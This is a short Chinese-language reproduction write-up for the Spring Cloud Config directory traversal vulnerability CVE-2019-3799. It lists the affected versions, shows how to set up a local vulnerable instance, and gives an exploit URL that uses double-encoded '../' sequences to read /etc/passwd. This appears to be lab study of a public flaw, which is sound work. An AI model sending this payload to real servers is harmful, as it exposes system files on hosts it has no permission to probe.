漏洞名称:Spring Cloud Config目录遍历漏洞(CVE-2019-3799)
威胁等级:高危
影响范围:Spring Cloud Config 2.1.0 to 2.1.1
                   Spring Cloud Config 2.0.0 to 2.0.3
                   Spring Cloud Config 1.4.0 to 1.4.5
漏洞类型:目录遍历
利用难度:容易

下载一个存在漏洞的 Spring Cloud Config,下载地址如下: 
https://github.com/spring-cloud/spring-cloud-config/releases

安装部署Spring Cloud Config步骤:

1.安装java环境

yum install -y java

2.部署Spring Cloud Config

$ cd spring-cloud-config-server
$ ../mvnw spring-boot:run

localhost:8888/foo/development


漏洞复现过程

1.EXP

http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f..%252f../etc/passwd
(%252f..因每个环境可能个数有些不同)

图片3.png